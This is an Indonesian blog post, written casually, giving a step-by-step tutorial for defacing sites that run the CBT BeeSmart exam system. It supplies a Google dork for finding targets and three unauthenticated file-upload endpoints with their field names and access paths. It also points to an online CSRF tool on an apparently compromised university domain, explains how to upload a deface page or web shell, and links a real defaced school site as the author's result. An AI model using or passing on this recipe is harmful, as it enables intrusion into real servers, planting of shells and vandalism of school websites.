Deface metode CBT BEESMART With Csrf



Ok , karena gw lagi gabut wkwkw, jadi mau nulis blog aja wkwkw, kebetulan kali ini gw mau share tutorial deface metode CBT BEESMART with Csrf 


Pertama-tama kita siapkan bahan-bahan nya terlebih dahulu 


Bahan-Bahan :


- Dork => Cbt Beesmart V3 login.php


- Exploit =>

 

/panel/pages/upload-file.php , postfile nya? uploadfile, cara akses? site.com/images/sckalian 


/panel/pages/upload_video.php , postfile nya? uploadfile3 , cara akses nya? site.com/video/sckalian 


/panel/pages/upload_audio.php , postfile nya? uploadfile2 , cara akses nya? site.com/audio/sckalian 


Csrf Online => 

https://labsosio.ui.ac.id/wp-snapshots/tmp/tools/csrf


SC Depes or Shell kalian 


Ok itu aja gw rasa , langsung aja ke tutorialnya, pertama-tama kalian ngedork di google




Pilih target dan masukkan Exploit nya, ciri2 Vuln gimana? blank putih






Kalau kek gitu biasa nya Vuln, langsung saja kita masuk ke Csrf Online nya 





Masukkan target berserta Exploit nya, lalu klik lock target 





Pilih file kalian dan klik upload, jika berhasil maka akan ada tulisan sucsess




Tinggal akses file nya, karena gw tadi Exploit nya /panel/pages/upload_video.php , jadi cara manggil nya , site.com/video/sckalian 





My results?


http://bahrululum.mkkmsby.my.id/video/1337.htm


Ok itu aja tq 


#Thanks To All Member Team


أحدث أقدم